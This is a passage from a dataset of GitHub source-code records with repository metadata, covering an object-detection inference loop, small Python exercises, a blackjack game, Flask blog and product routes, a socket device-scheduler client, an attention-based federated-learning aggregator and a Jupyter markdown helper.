collate_fn=collator.collate_fn,\n shuffle=False\n )\n\n # perform inference\n response = {}\n device = self.get_device()\n model.to(device)\n imgCount = 0\n for (img, _, _, fVec, imgID) in tqdm(dataLoader):\n\n # TODO: implement feature vectors\n # if img is not None:\n # dataItem = img.to(device)\n # isFeatureVector = False\n # else:\n # dataItem = fVec.to(device)\n # isFeatureVector = True\n dataItem = img.to(device)\n\n with torch.no_grad():\n bboxes_pred_batch, labels_pred_batch = model(dataItem, False) #TODO: isFeatureVector\n bboxes_pred_batch, labels_pred_batch, confs_pred_batch = dataEncoder.decode(bboxes_pred_batch.squeeze(0).cpu(),\n labels_pred_batch.squeeze(0).cpu(),\n inputSize,\n cls_thresh=optionsHelper.get_hierarchical_value(self.options, ['options', 'inference', 'encoding', 'cls_thresh', 'value'], fallback=0.1),\n nms_thresh=optionsHelper.get_hierarchical_value(self.options, ['options', 'inference', 'encoding', 'nms_thresh', 'value'], fallback=0.1),\n numPred_max=int(optionsHelper.get_hierarchical_value(self.options, ['options', 'inference', 'encoding', 'numPred_max', 'value'], fallback=128)),\n return_conf=True)\n\n for i in range(len(imgID)):\n bboxes_pred = bboxes_pred_batch[i]\n labels_pred = labels_pred_batch[i]\n confs_pred = confs_pred_batch[i]\n if bboxes_pred.dim() == 2:\n bboxes_pred = bboxes_pred.unsqueeze(0)\n labels_pred = labels_pred.unsqueeze(0)\n confs_pred = confs_pred.unsqueeze(0)\n\n # convert bounding boxes to YOLO format\n predictions = []\n bboxes_pred_img = bboxes_pred[0,...]\n labels_pred_img = labels_pred[0,...]\n confs_pred_img = confs_pred[0,...]\n if len(bboxes_pred_img):\n bboxes_pred_img[:,2] -= bboxes_pred_img[:,0]\n bboxes_pred_img[:,3] -= bboxes_pred_img[:,1]\n bboxes_pred_img[:,0] += bboxes_pred_img[:,2]/2\n bboxes_pred_img[:,1] += bboxes_pred_img[:,3]/2\n bboxes_pred_img[:,0] /= inputSize[0]\n bboxes_pred_img[:,1] /= inputSize[1]\n bboxes_pred_img[:,2] /= inputSize[0]\n bboxes_pred_img[:,3] /= inputSize[1]\n\n # limit to image bounds\n bboxes_pred_img = torch.clamp(bboxes_pred_img, 0, 1)\n\n\n # append to dict\n for b in range(bboxes_pred_img.size(0)):\n bbox = bboxes_pred_img[b,:]\n label = labels_pred_img[b]\n logits = confs_pred_img[b,:]\n predictions.append({\n 'x': bbox[0].item(),\n 'y': bbox[1].item(),\n 'width': bbox[2].item(),\n 'height': bbox[3].item(),\n 'label': dataset.labelclassMap_inv[label.item()],\n 'logits': logits.numpy().tolist(), #TODO: for AL criterion?\n 'confidence': torch.max(logits).item()\n })\n \n response[imgID[i]] = {\n 'predictions': predictions,\n #TODO: exception if fVec is not torch tensor: 'fVec': io.BytesIO(fVec.numpy().astype(np.float32)).getvalue()\n }\n\n # update worker state\n imgCount += len(imgID)\n updateStateFun(state='PROGRESS', message='predicting', done=imgCount, total=len(dataLoader.dataset))\n\n model.cpu()\n if 'cuda' in device:\n torch.cuda.empty_cache()\n\n return response","repo_name":"microsoft/aerial_wildlife_detection","sub_path":"ai/models/pytorch/boundingBoxes/retinanet.py","file_name":"retinanet.py","file_ext":"py","file_size_in_byte":27416,"program_lang":"python","lang":"en","doc_type":"code","stars":203,"dataset":"github-code","pt":"47"} +{"seq_id":"34419758964","text":"# DFS traversal of a tree\n\nclass Node:\n def __init__(self, key):\n self.left = None\n self.right = None\n self.val = key\n\n def DFS(self,root):\n if root:\n self.DFS(self,root.left)\n print(root.val)\n self.DFS(self,root.right)\n\nroot = Node(1)\nroot.left = Node(2)\nroot.right = Node(3)\nroot.left.left = Node(4)\nroot.left.right = Node(5)\n\nprint (\"Level Order Traversal of binary tree is -\")\nNode.DFS(Node,root)","repo_name":"karnabhchakraborty/100DaysOfCode","sub_path":"day1/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"30564276112","text":"import json\nimport boto3\n\n\ndef lambda_handler(event, context):\n print(event)\n details = event\n details[\"registered_users\"] = []\n\n dynamodb = boto3.resource(\"dynamodb\")\n table = dynamodb.Table(\"eventInfo-GoSports\")\n\n try:\n table.put_item(Item=details)\n\n return {\n 'statusCode': 200,\n 'headers': {\n 'Content-Type': 'application/json',\n 'Access-Control-Allow-Origin': '*'\n },\n 'body': json.dumps('Booking successful!')\n }\n except:\n return {\n 'statusCode': 400,\n 'headers': {\n 'Content-Type': 'application/json',\n 'Access-Control-Allow-Origin': '*'\n },\n 'body': json.dumps('Something went wrong!')\n }\n","repo_name":"kalpit07/GoSports","sub_path":"back-end/gosports-book-event.py","file_name":"gosports-book-event.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"2547856170","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom utils import convert_pca, utils\n\n\nclass nonLinearity(nn.Module):\n def __init__(self, in_channels, out_channels, bias=False):\n super(nonLinearity, self).__init__()\n self.main = torch.nn.Sequential(nn.Conv1d(in_channels, 2 * in_channels, kernel_size=1, bias=bias),\n torch.nn.LeakyReLU(),\n nn.Conv1d(2 * in_channels, out_channels, kernel_size=1, bias=bias))\n\n def forward(self, x):\n out = self.main(x)\n return out\n\n\nclass Affinity(nn.Module):\n def __init__(self, in_channels, out_channels, bias=False, self_attention=True, eps=0.001, scale=10):\n super(Affinity, self).__init__()\n\n self.key_conv = nonLinearity(in_channels, out_channels, bias=bias)\n if self_attention:\n self.query_conv = self.key_conv\n else:\n self.query_conv = nonLinearity(in_channels, out_channels, bias=bias)\n\n self.eps = eps\n self.scale = scale\n self.Threshold = nn.Threshold(self.eps,\n 0) # if n=10, no attackers, then each clients may get 0.1 , any client with lower than 1% of 0.1 will be discarded\n\n def forward(self, query, key):\n q_out = self.query_conv(query)\n k_out = self.key_conv(key)\n\n q_out = F.normalize(q_out, dim=1)\n k_out = F.normalize(k_out, dim=1)\n attention_scores = torch.bmm(q_out.transpose(1, 2), k_out)\n attention_scores *= self.scale\n attention_weights = F.softmax(attention_scores, dim=-1)\n\n attention_weights = self.Threshold(attention_weights)\n return attention_weights\n\n\nclass AttentionConv(nn.Module):\n def __init__(self, in_channels, out_channels, bias=False, eps=0.001, scale=10):\n super(AttentionConv, self).__init__()\n\n self.affinity = Affinity(in_channels, out_channels, bias=bias, eps=eps, scale=scale)\n\n # self.value_conv = nn.Conv1d(in_channels, in_channels, kernel_size=1,\n # bias=bias)\n\n def forward(self, query, key):\n v_out = key # self.value_conv(key)\n attention_weights = self.affinity(query, key)\n out = torch.einsum('bqi,bji -> bjq', attention_weights, v_out)\n\n return out, attention_weights\n\n\nclass AttentionLoop(nn.Module):\n def __init__(self, in_channels, out_channels, bias=False, nloop=2, eps=0.001, scale=10):\n super(AttentionLoop, self).__init__()\n\n self.attention = AttentionConv(in_channels, out_channels, bias=bias, eps=eps, scale=scale)\n self.nloop = nloop\n\n def forward(self, query, key):\n x = query\n for i in range(self.nloop):\n x, w = self.attention(x, key)\n out = x\n return out\n\n def getWeight(self, query, key):\n x = query\n for i in range(self.nloop):\n x, w = self.attention(x, key)\n out = w\n return out\n\n\nclass Net():\n def __init__(self, eps=0.005, scale=10):\n self.hidden_size = 32\n self.path_to_net = \"./aaa/attention.pt\"\n self.eps = eps\n self.scale = scale\n\n def main(self, deltas: list, model):\n '''\n deltas: a list of state_dicts\n\n return \n Delta: robustly aggregated state_dict\n\n '''\n\n stacked = utils.stackStateDicts(deltas)\n\n param_trainable = utils.getTrainableParameters(model)\n param_nontrainable = [param for param in stacked.keys() if param not in param_trainable]\n for param in param_nontrainable:\n del stacked[param]\n\n proj_vec = convert_pca._convertWithPCA(stacked)\n\n print(proj_vec.shape)\n model = AttentionLoop(proj_vec.shape[0], self.hidden_size, bias=False, nloop=5, eps=self.eps, scale=self.scale)\n model.load_state_dict(torch.load(self.path_to_net))\n model.eval()\n\n x = proj_vec.unsqueeze(0)\n beta = x.median(dim=-1, keepdims=True)[0]\n weight = model.getWeight(beta, x)\n weight = F.normalize(weight, p=1, dim=-1)\n\n weight = weight[0, 0, :]\n print(weight)\n\n Delta = utils.applyWeight2StateDicts(deltas, weight)\n # print(Delta)\n\n return Delta\n","repo_name":"cpwan/Attack-Adaptive-Aggregation-in-Federated-Learning","sub_path":"aaa/attention.py","file_name":"attention.py","file_ext":"py","file_size_in_byte":4236,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"47"} +{"seq_id":"28718115600","text":"import random\n\n#2 - 10 as is\n#J,K,Q -10\n\nclass HumanPlayer:\n\tdef __init__(self):\n\t\tself.money = 100\n\t\tself.bet = 0\n\n\tdef betM(self,amount):\n\t\tself.bet = amount\n\n\tdef subBalance(self):\n\t\tself.money = self.money - self.bet\n\n\tdef addBalance(self):\n\t\tself.money = self.money * 2\n\n\nclass Cards:\n\tdef __init__(self):\n\t\tself.cards = [(x,y) for x in range(2,15) for y in ['Dice','Spade','Clubs','Heart']]\n\t\tself.myshuffle()\n\n\tdef hit(self):\n\t\treturn self.cards.pop(0)\n\n\tdef myshuffle(self):\n\t\trandom.shuffle(self.cards)\n\ndef main():\n\thuman = HumanPlayer()\n\tprint(\"You start with $100\")\n\twhile True:\n\t\twhile True:\n\t\t\tdeck = Cards()\n\t\t\thumanValue = 0\n\t\t\tcompValue = 0\n\t\t\twhile True:\n\t\t\t\ttry:\n\t\t\t\t\tbetMoney = int(input(\"Enter amount to bet\"))\n\t\t\t\texcept:\n\t\t\t\t\tprint(\"Enter valid input\")\n\t\t\t\telse:\n\t\t\t\t\tif human.money < betMoney:\n\t\t\t\t\t\tprint(\"Not enough funds\")\n\t\t\t\t\telse:\n\t\t\t\t\t\thuman.betM(betMoney)\n\t\t\t\t\t\tbreak\n\t\t\thumanCards = [deck.hit(), deck.hit()]\n\t\t\tcompCards = [deck.hit(), deck.hit()]\n\t\t\tprint(\"Computer's cards are: \")\n\t\t\tprint(compCards[0])\n\t\t\tprint(\"Your cards are: \")\n\t\t\tprint(humanCards[0])\n\t\t\tprint(humanCards[1])\n\t\t\thumanValue = getValue(humanCards)\n\t\t\tprint(\"Your value is \" + str(humanValue))\n\t\t\tcompValue = getValue(compCards)\n\t\t\tprint(\"Computer value is \" + str(compValue))\n\t\t\twhile True:\n\t\t\t\tres = input(\"HIT OR STAY?\")\n\t\t\t\tif res == \"HIT\":\n\t\t\t\t\thumanCards.append(deck.hit())\n\t\t\t\t\thumanValue = getValue(humanCards)\n\t\t\t\t\tprint(\"Your value is \" + str(humanValue))\n\t\t\t\t\tif humanValue > 21:\n\t\t\t\t\t\tbreak\n\t\t\t\telif res == \"STAY\":\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tprint(\"Enter valid input\")\n\n\t\t\tif humanValue > 21:\n\t\t\t\tprint(\"You exceeded 21, you lost\")\n\t\t\t\thuman.subBalance()\n\t\t\t\tbreak\n\t\t\tprint(\"Dealer is playing\")\n\t\t\twhile compValue < 17:\n\t\t\t\tcompCards.append(deck.hit())\n\t\t\t\tcompValue = getValue(humanCards)\n\t\t\t\tprint(\"Computer value is \" + str(compValue))\n\t\t\tif compValue > 21 or humanValue > compValue:\n\t\t\t\thuman.addBalance()\n\t\t\t\tprint(\"You won! Your total amount is now \" + str(human.money))\n\t\t\telse:\n\t\t\t\thuman.subBalance()\n\t\t\t\tprint(\"You lost! Your total amotn is now \" + str(human.money))\n\t\t\tbreak\n\t\tplayAgain = input(\"Do you want ot play again?\")\n\t\tif playAgain == 'NO':\n\t\t\tbreak\n\n\t\t\n\ndef getValue(cards):\n\tvalue = 0\n\taceCount = 0\n\tfor c in cards:\n\t\tif c[0] >= 2 and c[0] <= 10:\n\t\t\tvalue += c[0]\n\t\telif c[0] >= 11 and c[0] <= 13:\n\t\t\tvalue += 10\n\t\telse:\n\t\t\taceCount += 1\n\tfor i in range(0, aceCount):\n\t\tif value + 11 <= 21:\n\t\t\tvalue += 11\n\t\telse:\n\t\t\tvalue += 1\n\tprint(cards)\n\treturn value\n\t\n\n\n\nif __name__ == '__main__':\n\tmain()\n\n","repo_name":"javaComSci/BlackJack","sub_path":"blackjack.py","file_name":"blackjack.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"31454160326","text":"'''\nCreated on Feb 9, 2016\n\n@author: rajeev.kumar\nDescription :Delete user bundle(custom)\nTest Flow :1)Login as aAdmin user and Delete existing bundles.\n\n'''\nfrom globalImports import *\n\ntc_id=utility.get_tc_data(__file__)\n\nclass Testcase(Manager.Manager): \n \"\"\"\n Delete user bundle(custom)\n \"\"\"\n \n def __init__(self, *args, **kwargs):\n \"\"\"\n Initialization\n \"\"\"\n Manager.Manager.__init__(self, tc_id, *args, **kwargs)\n \n @BaseClass.TestBase.func_exec\n def test_functionality(self): \n \"\"\"\n This is the execution starting function\n \"\"\"\n self.browserObject = globalVars.browserObject\n \n #Login as Admin user\n self.verifyCurrentUser(userRole='Administrator', loginAsUser=True)\n \n self.getCustomBundle_DeleteCustom(\"Repositories\")\n self.logout()","repo_name":"baoshuang/29-may-2017-h","sub_path":"GUI/gui-automation-ASMvNext84UI/tests/Testcase_NGI-TC-3188.py","file_name":"Testcase_NGI-TC-3188.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"28345633988","text":"import socket\nimport time\n\nHEADER = 64\nPORT = 5050\nFORMAT = 'utf-8'\nSERVER = socket.gethostbyname(socket.gethostname()) \nADDR = (SERVER, PORT)\n\nclient = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nclient.connect(ADDR)\n\ndef send(msg):\n \"\"\"Sends a message to the server.\"\"\"\n message = msg.encode(FORMAT)\n msg_length = len(message)\n send_length = str(msg_length).encode(FORMAT)\n send_length += b' ' * (HEADER - len(send_length))\n client.send(send_length)\n client.send(message)\n return client.recv(2048).decode(FORMAT)\n\ntotal_on_time = 0\ndevice_on_time = 0\ndevice_is_on = False\n\ndef turn_off_device():\n global total_on_time, device_on_time, device_is_on\n if device_is_on:\n response = send(\"turn off\")\n if response == \"Device state is now: off\":\n device_off_time = time.time()\n total_on_time += device_off_time - device_on_time\n print(\"Device was turned ON for: {:.2f} seconds\".format(device_off_time - device_on_time))\n device_is_on = False\n else:\n print(\"Device is already off.\")\n\n\n\ndef turn_on_device():\n global total_on_time, device_on_time, device_is_on\n if not device_is_on:\n response = send(\"turn on\")\n if response == \"Device state is now: on\":\n device_on_time = time.time()\n device_is_on = True\n print(\"Device is now ON\")\n else:\n print(\"Device is already on.\")\n\n\n\n\ndef quit_program():\n global total_on_time\n if device_is_on:\n turn_off_device()\n print(\"Total Device On-Time: {:.2f} seconds\".format(total_on_time))\n send(\"quit\")\n exit()\n\n\n\ndef get_user_input():\n user_input = input(\"Do you want to turn on, turn off, or set a schedule for the device? \\n\")\n return user_input\n\n\n\ndef schedule_device_action(action_func, time_to_wait):\n print(f\"Scheduling device {action_func.__name__} in {time_to_wait:.2f} seconds.\")\n time.sleep(time_to_wait)\n action_func()\n\n\n\ndef schedule():\n while True:\n action = input(\"Do you want to schedule the device to turn on? (yes/no) \\n \").lower()\n if action not in [\"yes\", \"no\"]:\n print(\"Invalid input. Please enter 'yes' or 'no'.\")\n return\n\n if action == \"no\":\n break\n\n time_unit = input(\"Do you want to set the schedule in hours or minutes? \").lower()\n if time_unit not in [\"hours\", \"minutes\"]:\n print(\"Invalid input. Please choose 'hours' or 'minutes'.\")\n return\n\n time_conversion = 60 if time_unit == \"minutes\" else 3600 # Conversion factor\n\n start_time = int(input(f\"Enter the starting point in {time_unit}: \"))\n end_time = int(input(f\"Enter the ending point in {time_unit}: \"))\n\n start_time_seconds = start_time * time_conversion\n end_time_seconds = end_time * time_conversion\n\n if action == \"yes\":\n schedule_device_action(\n action_func=turn_on_device,\n time_to_wait=start_time_seconds,\n )\n schedule_device_action(\n action_func=turn_off_device,\n time_to_wait=end_time_seconds - start_time_seconds,\n )\n \n break\n\nwhile True:\n user_input = get_user_input()\n\n if user_input == \"turn on\":\n if not device_is_on:\n response = send(\"turn on\")\n if response == \"Device state is now: on\":\n device_on_time = time.time()\n device_is_on = True\n print(\"Device is now ON\")\n elif user_input == \"turn off\":\n turn_off_device()\n elif user_input == \"schedule\":\n schedule()\n elif user_input == \"quit\":\n quit_program()\n else:\n print(\"Invalid input.\")\n","repo_name":"Haseeb1919/schedule-socket-demo","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"1309864311","text":"\"\"\"\nChiper.Posts\n\nThis module handles the endpoints for post creation, editing, liking.\nIt also handles the same operations for comments (except editing).\n\"\"\"\n\nfrom flask import Blueprint, flash, redirect, render_template, request, url_for\nfrom flask_login import current_user\nfrom werkzeug.exceptions import abort\n\nfrom chirper.auth import login_required\nfrom chirper.database import Comment, Post, db\nfrom chirper.forms import CommentForm, PostForm\n\nbp = Blueprint('posts', __name__, url_prefix='/posts')\n\n\ndef get_one_post(id, check_author=True):\n \"\"\"\n Params::\n\n id: (int) Id of the post to be returned\n\n check_author: (bool) Bypass author check. For moderator access.\n\n Returns::\n\n Post: Post object with the data of the given post id\n\n HTTPException:\n\n 404: Post does not exits\n\n 403: Not authorized \n \"\"\"\n\n post = Post.query.get(int(id))\n\n if post is None:\n abort(404, f'Post id {id} does not exist.')\n\n if check_author and post.author_id != current_user.id:\n abort(403)\n\n return post\n\n\n@bp.route('/', methods=['GET', 'POST'])\n@login_required\ndef post_page(id):\n \"\"\"\n Endpoint: posts/\n\n Handles : GET, POST\n\n Post page. Contains posts like index but also shows and lets you send comments\n \"\"\"\n\n post = Post.query.filter_by(id=id).first_or_404()\n comments = post.comments\n comment_form = CommentForm()\n\n if comment_form.validate_on_submit():\n new_comment = Comment(\n post_id=post.id,\n author_id=current_user.id,\n body=comment_form.body.data\n )\n db.session.add(new_comment)\n db.session.commit()\n flash('Comment has been added!', category='info')\n return redirect(url_for('posts.post_page', id=post.id))\n\n return render_template('posts/post.html', post=post, comments=comments, comment_form=comment_form)\n\n\n@bp.route('/comment//delete')\n@login_required\ndef delete_comment(id):\n \"\"\"\n Endpoint: comment//delete\n\n Handles : GET, POST\n\n API endpoint for deleting comments. Needs authorization of the poster\n \"\"\"\n\n comment = Comment.query.filter_by(id=id).first_or_404()\n\n if current_user.id == comment.author_id:\n db.session.delete(comment)\n db.session.commit()\n return redirect(request.referrer)\n\n\n@bp.route('/comment//')\n@login_required\ndef like_comment(id, action):\n \"\"\"\n Endpoint: comment//like\n\n Handles : GET, POST\n\n API endpoint for liking comments.\n \"\"\"\n\n comment = Comment.query.filter_by(id=id).first_or_404()\n\n if action == 'like':\n current_user.like_comment(comment)\n elif action == 'unlike':\n current_user.unlike_comment(comment)\n\n db.session.commit()\n return redirect(request.referrer)\n\n\n@bp.route('/create', methods=['GET', 'POST'])\n@login_required\ndef create():\n \"\"\"\n Endpoint: posts/create\n\n Handles : GET, POST\n\n Post creation page.\n \"\"\"\n\n if not current_user.is_authenticated:\n flash('You are not logged in!', category='danger')\n return redirect(url_for('auth.login'))\n\n post_form = PostForm()\n\n if post_form.validate_on_submit():\n new_post = Post(author_id=current_user.id,\n title=post_form.title.data,\n body=post_form.body.data\n )\n db.session.add(new_post)\n db.session.commit()\n flash('Post has been created!', category='info')\n return redirect(url_for('index'))\n\n return render_template('posts/create.html',\n form=post_form)\n\n\n@bp.route('//edit', methods=['GET', 'POST'])\n@login_required\ndef edit(id):\n \"\"\"\n Endpoint: posts//edit\n\n Handles : GET, POST\n\n Post editing page, author can change the contents of the post or delete it\n \"\"\"\n\n post = get_one_post(id)\n post_form = PostForm()\n\n if post_form.validate_on_submit():\n\n if post_form.delete.data:\n db.session.delete(post)\n db.session.commit()\n flash('Post has been deleted!', category='danger')\n return redirect(url_for('index'))\n\n post.title = post_form.title.data\n post.body = post_form.body.data\n\n db.session.commit()\n flash('Post has been updated!', category='info')\n next_page = request.args.get('next')\n\n return redirect(next_page or url_for('posts.post_page', id=post.id) or url_for('index'))\n else:\n post_form.title.data = post.title\n post_form.body.data = post.body\n return render_template('posts/edit.html', form=post_form, post=post)\n\n\n@bp.route('//delete', methods=['POST', 'GET'])\n@login_required\ndef delete(id):\n \"\"\"\n Endpoint: posts//delete\n\n Handles : POST\n\n API endpoint for deleting posts. Needs authorization of the poster\n \"\"\"\n\n post = get_one_post(id)\n\n if current_user.id == post.author_id:\n db.session.delete(post)\n db.session.commit()\n flash('Post has been deleted!', category='danger')\n return redirect(url_for('index'))\n flash('You cannot delete a post from someone else', category='danger')\n return redirect(url_for('index'))\n\n\n@bp.route('/like//')\n@login_required\ndef like_action(post_id, action):\n \"\"\"\n Endpoint: /like//\n\n Handles : POST\n\n API endpoint for liking/unliking posts. Needs authorization of the poster\n \"\"\"\n\n post = Post.query.filter_by(id=post_id).first_or_404()\n\n if action == 'like':\n current_user.like_post(post)\n elif action == 'unlike':\n current_user.unlike_post(post)\n\n db.session.commit()\n return redirect(request.referrer)\n","repo_name":"Frozander/Chirper","sub_path":"chirper/posts.py","file_name":"posts.py","file_ext":"py","file_size_in_byte":5764,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"26191242727","text":"from .. import db\nimport json\nimport logging\nfrom flask import redirect, url_for, Blueprint, render_template, request, jsonify, Response\nfrom ..models import Products\nimport random\n\nproducts_page = Blueprint('products', __name__)\n\n\n@products_page.route('/products')\ndef products():\n page = request.args.get('id', default=None, type=int)\n try:\n data = Products.query.filter_by(id=page).first()\n product = {\"name\": data.name, \"description\": data.description, \"price\": data.price,\n \"isAvailable\": data.isAvailable}\n return product\n except AttributeError:\n return Response(\"Product with that id not exists.\", 400)\n\n\n@products_page.route('/add_product', methods=['POST'])\ndef add_product_to_basket():\n content_type = request.headers.get('Content-Type')\n if (content_type != 'application/json'):\n return jsonify({'message': 'Content-Type not supported!'})\n json = request.json\n name = json[\"name\"]\n description = json[\"description\"]\n price = json[\"price\"]\n isAvailable = json[\"isAvailable\"]\n new_product = Products(name=name, description=description, price=price, isAvailable=isAvailable)\n try:\n db.session.add(new_product)\n db.session.commit()\n res = jsonify({'message': f'product \"{name}\" added successfully',\n 'product': json})\n return (res, 201)\n except AttributeError:\n return {'message':'Error'}, 499\n\n\n@products_page.route('/delete_product', methods=['DELETE'])\ndef delete_product_from_basket():\n content_type = request.headers.get('Content-Type')\n if (content_type != 'application/json'):\n return 'Content-Type not supported!'\n json = request.json\n product = json['product']\n\n return jsonify({'message':f'{product} was deleted successfully!', 'product':{json}}), 209\n","repo_name":"EgorRedkozubov/KostyanSite","sub_path":"website/pages/products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"14072929838","text":"from __future__ import absolute_import\nfrom IPython.core.getipython import get_ipython\nfrom IPython.core.magic import (Magics, magics_class, cell_magic)\nimport sys\nfrom markdown import markdown\nfrom IPython.core.display import HTML\nchangeFormulaDict = [\n (r'>',r'>'),\n (r'<',r'<'),\n (r'∑ (\\S+) (\\S+)',r'\\\\SUM{\\1}{\\2}'),\n (r'S (\\S+) (\\S+)',r'\\\\INT{\\1}{\\2}'),\n (r'(\\S+)/(\\S+)',r'\\\\frac{\\1}{\\2}'),\n (r'§(\\S+)',r'\\\\oint_{\\1}'),\n (r'¬(\\S+)',r'\\\\overline{\\1}'),\n (r'・・(\\S+)',r'\\\\ddot{\\1}'),\n (r'・(\\S+)',r'\\\\dot{\\1}'),\n (r'lim (\\S+)',r'\\\\lim_{\\1}'),\n (r'hat (\\S+)',r'\\\\hat{\\1}'),\n (r'√(\\S+)',r'\\\\sqrt{\\1}'),\n (r'oo',r'\\\\infty '), \n (r'µ',r'\\\\mu '), \n (r'\\.∆',r'\\\\bigtriangledown '), \n (r'∆',r'\\\\bigtriangleup '), \n (r'pi',r' \\\\pi '),\n (r'forall',r' \\\\forall '),\n (r'ヨ',r' \\\\exists '),\n (r' in ',r' \\\\in '),\n (r'ø',r'\\\\theta'),\n (r'<=',r'≤'),\n (r'>=',r'≥'),\n (r'\\.a',r'\\\\alpha '), \n (r'\\.b',r'\\\\beta '), \n (r'\\.c',r'\\\\gamma '), \n (r'\\.d',r'\\\\delta '), \n (r'\\.e',r'\\\\epsilon '), \n (r'\\.E',r'\\\\xi '),\n (r'\\.l',r'\\\\lambda '), \n (r'\\.m',r'\\\\mu '), \n (r'\\.n',r'\\\\eta '), \n (r'\\.o',r'\\\\theta '), \n (r'\\.p',r'\\\\varphi '),\n (r'\\.r',r'\\\\rho '),\n (r'\\.t',r'\\\\tau '), \n (r'\\.u',r'\\\\upsilon '),\n (r'\\.v',r'\\\\nu '),\n (r'\\.w',r'\\\\omega '), \n (r'\\.s',r'\\\\sigma '), \n (r'\\.x',r'\\\\chi '),\n (r'\\.y',r'\\\\psi '),\n (r'\\.z',r'\\\\zeta '), \n (r'\\.\\|(\\S+)',r'\\mathbb{\\1}'),\n (r';(\\S)',r'\\mathbb{\\1}'),\n (r'\\.\\^(\\S+)',r'\\hat{\\1}'),\n (r'\\^(\\S+)',r'^{\\1}'),\n (r'_(\\S+)',r'\\\\zenkakuunderscore{\\1}'),\n\n # (r' ',r'\\\\,'),\n (r'->',r'\\\\rightarrow '), \n (r'\\!\\{',r'\\\\left\\\\{ \\\\begin{array}{ll}'),\n (r'\\!\\(',r'\\\\left( \\\\begin{array}{ll}'),\n (r'\\!\\.',r'\\\\left\\\\. \\\\begin{array}{ll}'),\n (r'\\!}',r'\\\\end{array} \\\\right.'),\n (r'\\!\\)',r'\\\\end{array} \\\\right)'),\n (r' or ',r' \\\\\\\\ '),\n]\nchangeJpDict = [\n (r'#',r'#'),\n (r' ',r' '),\n (r'・',r'- ')\n]\n# optDict = \"6:§, v:√, ^:≠ , j:∆, x:≈, m:µ, ~:±, o:ø, O:Ø, P:∏ 4:¢c:ç\"\nimport re\ndef replaceAll(k,v,code,i = 0):\n replaced = re.sub(k,v,code) \n return replaced\n #if replaced == code or i > 10: return code \n #return replaceAll(k,v,replaced,i + 1)\n\ndef te(code) : return tex(code,'$')\ndef p(code) : return te(code)\ndef P(code) : return tex(code)\ndef tex(code,doller = \"$$\") : \n for k,v in changeFormulaDict:\n code = re.sub(k,v,code)\n return ( doller + code + doller)\n\n\n \n@magics_class\nclass MarkdownMagics(Magics):\n @cell_magic \n def m(self, line, cell):\n # 日本語または全角:マークダウン\n # 半角アルファベット:数式\n cell = self.toMD72(cell)\n #return cell\n return HTML(\"

{}

\".format(markdown(cell, extensions=['markdown.extensions.extra'])))\n def toMD72(self,code): \n formulaAlphabet = r'a-zA-Z0-9\\t\\r\\f\\v \\-[\\]!\"#$%&()=~^|@`{}+;*:<,>.?/ø∑ç√§δ'\n formulaAlphabets = r'([' + formulaAlphabet + r']{2,})' \n notFormulaAlphabets = r'([^' + formulaAlphabet + r']+)' \n code = re.sub(formulaAlphabets,r'$ \\1 $',code)\n for k,v in changeFormulaDict:\n code = replaceAll(k,v,code)\n #code = re.sub(k,v,code) \n for k,v in changeJpDict:\n code = re.sub(k,v,code)\n #for k,v in changeFormulaDict:\n #m = re.match(formulaAlphabets,code) \n return code\n \nget_ipython().register_magics(MarkdownMagics)\n\n#ESC-A-M :: MarkdownCell\n\n\"Python Definition\"","repo_name":"Muratam/dotfiles","sub_path":"module/python3/jupyterlib72.py","file_name":"jupyterlib72.py","file_ext":"py","file_size_in_byte":3618,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"73078158543","text":"import tkinter as tk\r\nfrom translate import Translator\r\n\r\ndef translate_text():\r\n text = text_entry.get()\r\n if text:\r\n translator = Translator(to_lang='hi')\r\n translation = translator.translate(text)\r\n translated_text.set(translation)\r\n\r\n# main application window\r\nroot = tk.Tk()\r\nroot.title(\"Language Translator\")\r\n\r\n# widgets\r\ntext_entry = tk.Entry(root, width=50)\r\ntext_entry.pack(pady=10)\r\ntranslate_button = tk.Button(root, text=\"Translate\", command=translate_text)\r\ntranslate_button.pack(pady=5)\r\ntranslated_text = tk.StringVar()\r\nresult_label = tk.Label(root, textvariable=translated_text, wraplength=400, justify=\"center\", bg=\"lightgray\")\r\nresult_label.pack(pady=10)\r\n\r\nroot.mainloop()","repo_name":"mihirchandna/translator-python-gui","sub_path":"proj.py","file_name":"proj.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"19208868819","text":"from sqlalchemy import Column, MetaData, Table, create_engine, Sequence\nfrom sqlalchemy.dialects import postgresql\nfrom databases import Database\nfrom app.api.settings import getConfig\n\ncnf = getConfig()\n\nDATABASE_URL = \"postgresql://{0}:{1}@{2}:{3}/{4}\".format(\n cnf.DB_USER, cnf.DB_PASS, cnf.DB_HOST, cnf.DB_PORT, cnf.DB_DATABASE\n)\n\nengine = create_engine(DATABASE_URL)\nmetadata = MetaData()\n\nfile_process_log = Table(\n \"file_process_log\",\n metadata,\n Column(\n \"file_process_id\",\n postgresql.VARCHAR(100),\n primary_key=True,\n ),\n Column(\"fp_id\", postgresql.BIGINT),\n Column(\"filename\", postgresql.VARCHAR(100)),\n Column(\"source_ip\", postgresql.VARCHAR(15)),\n Column(\"file_size\", 